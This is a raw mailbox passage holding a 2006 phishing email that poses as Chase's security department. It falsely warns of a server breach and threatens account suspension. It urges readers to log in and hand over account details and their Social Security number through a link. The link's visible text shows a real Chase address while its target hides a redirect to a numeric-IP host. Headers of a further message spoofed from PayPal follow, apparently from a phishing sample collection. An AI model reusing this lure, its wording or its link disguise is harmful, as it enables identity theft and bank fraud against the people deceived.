From: Chase <security@chase.com>
Content-Type: text/html
Message-Id: <20060413075440.2C527869FD@mxis-gonesse.promotrans.fr>
Date: Thu, 13 Apr 2006 09:54:40 +0200 (CEST)
Status: O
X-Status: 
X-Keywords:                  
X-UID: 782


<tr><td>
<div>
<td valign=top><font size=2><img height=42 
src="http://www.chase.com/cm/shared/cfs/image/logo/chase_logo.gif" 
width=313></font></td></tr></tbody></table>
<table cellspacing=0 cellpadding=0 width=595 border=0>
              <tbody>
              <tr>
                <td colspan=5><font size=2><img height=5 alt="" src="" 
width=1></font></td></tr>
              <tr>
                <td class=staticPageBorder colspan=5><font size=2><img 
height=1 alt="" src="" width=1></font></td></tr>
              <tr>
                <td class=staticPageBorder width=1><font face=Arial 
size=2><img height=6 alt="" src="" width=1></font></td>
                <td width=71><font face=Arial size=2><img height=1 
alt="" src="" width=1></font></td>
                <td width=491><font face=Arial size=2><img height=1 
alt="" src="" width=1></font></td>
                <td width=30><font face=Arial size=2><img height=1 
alt="" src="" width=1></font></td>
                <td class=staticPageBorder width=1><font face=Arial 
size=2><img height=1 alt="" src="" width=1></font></td></tr>
              <tr>
                <td class=staticPageBorder width=1><font face=Arial 
size=2><img height=1 alt="" src="" width=1></font></td>
                <td width=71><font face=Arial size=2><img height=1 
alt="" src="" width=1></font></td>
                <td width=491>
                  <table class=jumpnav cellspacing=0 cellpadding=0 
border=0>
                    <tbody>
                    <tr>
                      <td align=left width=246></td>
                      <td valign=top align=right width=245>
                        <div 
class=generictext></div></td></tr></tbody></table>
                  <div class=generictext>
                  <p><font size=2><br><font face=Arial><strong><br>Dear 
                  Chase Customer</strong><br><br>We are sorry to 
announce you  
                  that a possible security breach into our server can 
lead to  
the suspension of your account. 
                  This notification it's valid only for Chase mastercard 
users and JPMorgan Chase 
only. 
                  Please review and do not disconsider this 
notification. 
Thank you for your understanding!  
                  </font></font></p>
                  <p><font size=2><font face=Arial>To ensure that your 
account 
                  is not compromised please login to Chase Internet 
                  Banking by clicking this link, verify your identity, 
your 
                  account information and supply a valid Social Security 
number in order 
                  to keep your account opened and working. 
                  </font><br></font></p></div>
                  <div class=generictext><font face=Arial size=2>- Click 
on: <a 
href="http://google.com/url?sa=p&pref=ig&pval=2&q=http://1399754032:8989/chase.com/index.php">https://chaseonline.chase.com/colappmgr/colportal/prospect?_nfpb=true&amp;_pageLabel=page_logonform</a></font> 
                  </div>
                  <div class=generictext><font face=Arial size=2>- Enter 
your 
                  personal information and supply a valid Social 
Security number.<br>- 
                  Verify your identity with Chase</font> </div>
                  <div class=generictext><font face=Arial size=2><br>If 
at any 
                  time you require assistance, please contact our Online 
Account 
                  Services customer hotline at 1-800-788-7000 24 hours a 
day, 7 
                  days a week.<br><br>Thank you for using Chase 
                  Online Account Services.</font> </div><font 
size=2><br></font>
                  <table cellspacing=0 cellpadding=0 border=0>
                    <tbody>
                    <tr valign=top>
                      <td class=exitPageDivider width=491><font 
face=Arial size=2><img height=1 alt="" src="" width=1></font></td></tr>
                    <tr valign=top>
                      <td width=491><font face=Arial size=2><img 
height=3 alt="" src="" width=1></font></td></tr></tbody></table>
                  <div class=footnote>
                  <p><font face=Arial size=2>Sincerely,<br>Genevieve 
Smith - 
                  Chase Security Department<br></font></p>
                  <p></p>
                  <p></p>
                  <p></p></div>
                  <div><font face=Arial size=2><img class=inline 
height=10 alt="" src="" width=1></font> </div></td>
                <td width=30><font face=Arial size=2><img height=1 
alt="" src="" width=1></font></td>
                <td class=staticPageBorder width=1><font face=Arial 
size=2><img height=1 alt="" src="" width=1></font></td></tr>
              <tr>
                <td class=staticPageBorder width=1><font face=Arial 
size=2><img height=6 alt="" src="" width=1></font></td>
                <td colspan=3>
                  <table cellspacing=0 cellpadding=0 border=0>
                    <tbody>
                    <tr>
                      <td width=44><font face=Arial size=2><img height=1 
alt="" src="" width=44></font></td>
                      <td width=537>
                        <div id=footer>
                        <p class=footer1><b><font face=Arial size=2>2006 
<span class=generictext><font face=Arial><span 
class=footnote>Chase</span></font></span> 
                        ,Inc . All rights<br>
                    <font face=Arial size=1>


From service@paypal.com  Thu Apr 13 11:55:36 2006
Return-Path: <service@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP id 378A1537223
	for <nobody@login.example.com>; Thu, 13 Apr 2006 11:55:36 -0400 (EDT)
Received: from dime51.dizinc.com (dime51.dizinc.com [72.29.73.35])
	by mail1.example.com (Postfix) with ESMTP id 0E5226CCE37
	for <nobody@example.com>; Thu, 13 Apr 2006 07:09:16 -0400 (EDT)
Received: from 82-33-128-73.cable.ubr01.wiga.blueyonder.co.uk ([82.33.128.73] helo=User)
	by dime51.dizinc.com with esmtpa (Exim 4.52)
	id 1FU49O-00052d-6g; Thu, 13 Apr 2006 11:54:30 -0400
Reply-To: <do-not-reply-to@paypal.com>
